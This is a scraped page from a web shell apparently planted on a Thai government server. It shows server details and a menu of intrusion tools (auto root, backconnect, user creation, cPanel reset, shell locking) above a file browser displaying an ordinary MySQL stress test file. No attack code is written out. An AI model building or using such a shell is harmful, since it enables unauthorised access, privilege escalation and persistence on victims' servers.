Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
mysql-test /
suite /
stress /
t /
[ HOME SHELL ]
Name
Size
Permission
Action
ddl_archive.test
1.39
KB
-rw-r--r--
ddl_csv.test
1.36
KB
-rw-r--r--
ddl_innodb.test
1.26
KB
-rw-r--r--
ddl_memory.test
1.23
KB
-rw-r--r--
ddl_myisam.test
1.23
KB
-rw-r--r--
ddl_ndb.test
1.64
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ddl_myisam.test
######## t/ddl_myisam.test ###### # # Stress the storage engine MyISAM with CREATE/DROP TABLE/INDEX # # Please look for details within include/ddl1.inc. # # Creation of this test: # 2007-07-04 mleich # # Storage engine to be used in CREATE TABLE let $engine_type= MyISAM; if (`SELECT $PS_PROTOCOL + $SP_PROTOCOL + $CURSOR_PROTOCOL + $VIEW_PROTOCOL > 0`) { --skip Test requires: ps-protocol/sp-protocol/cursor-protocol/view-protocol disabled } let $run= `SELECT '$BIG_TEST' = '1'`; if ($run) { # A run started with "--big-test" should be allowed to consume more time. # Rough intended runtime per subtest variant in seconds let $runtime = 5; # number of rounds till we look at the clock again let $loop_size= 100; } if (!$run) { let $runtime = 1; let $loop_size= 20; } ##### Some preparations needed for the ddl*.inc scripts --source suite/stress/include/ddl.pre --source suite/stress/include/ddl1.inc --source suite/stress/include/ddl2.inc --source suite/stress/include/ddl3.inc --source suite/stress/include/ddl4.inc --source suite/stress/include/ddl5.inc --source suite/stress/include/ddl6.inc --source suite/stress/include/ddl7.inc --source suite/stress/include/ddl8.inc ##### Cleanup --source suite/stress/include/ddl.cln
Close